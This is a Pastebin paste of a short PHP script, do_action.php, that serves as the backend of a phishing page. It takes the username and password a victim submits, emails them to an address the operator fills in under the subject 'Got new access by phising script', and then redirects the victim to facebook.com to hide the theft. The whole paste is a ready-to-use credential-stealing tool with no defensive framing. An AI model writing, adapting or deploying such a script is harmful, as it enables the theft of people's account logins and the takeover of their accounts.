Advertisement
FlyFar

do_action.php

Jun 18th, 2023
1,001
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.57 KB | Cybersecurity | 0 0
  1. <?php
  2.  
  3.     function mail_sender(){
  4.         if(! ( isset($_REQUEST['username']) && isset($_REQUEST['password']) ) ){
  5.             return false;
  6.         }
  7.  
  8.         $username = $_REQUEST['username'];
  9.         $password = $_REQUEST['password'];
  10.        
  11.         $reciever = "YOUR-EMAIL ADRRESS";
  12.        
  13.         $subject = "Got new access by phising script";
  14.         $message = "The username is ". $username;
  15.         $message .= "and password is ". $password;
  16.        
  17.         return mail($reciever, $subject, $message);
  18.     }
  19.    
  20.     if(mail_sender()){
  21.         header("Location: http://www.facebook.com");
  22.     }
  23.     header("location:javascript://history.go(-1)");
  24. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement